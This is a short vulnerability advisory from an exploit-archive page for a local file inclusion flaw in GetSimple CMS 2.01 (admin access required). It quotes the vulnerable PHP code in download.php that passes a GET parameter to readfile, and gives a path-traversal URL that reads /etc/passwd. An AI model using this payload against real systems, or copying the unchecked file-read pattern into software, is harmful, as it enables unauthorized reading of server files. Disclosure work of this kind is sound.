Home / os / win7

GetSimple 2.01 Local File Include Vulnerability

Posted on 06 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>GetSimple 2.01 Local File Include Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== GetSimple 2.01 Local File Include Vulnerability =============================================== # Exploit Title: GetSimple 2.01 LFI # Date: 4/5/2010 # Author: Batch # Software Link: http://www.box.net/get-simple # Version: 2.01 #Special Conditions: Must be admin. # Code : ... # get file if (file_exists($_GET['file'])) { readfile($_GET['file'], 'r'); } exit; ... http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd #-Batch #ryan1918.com #Everyone else. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP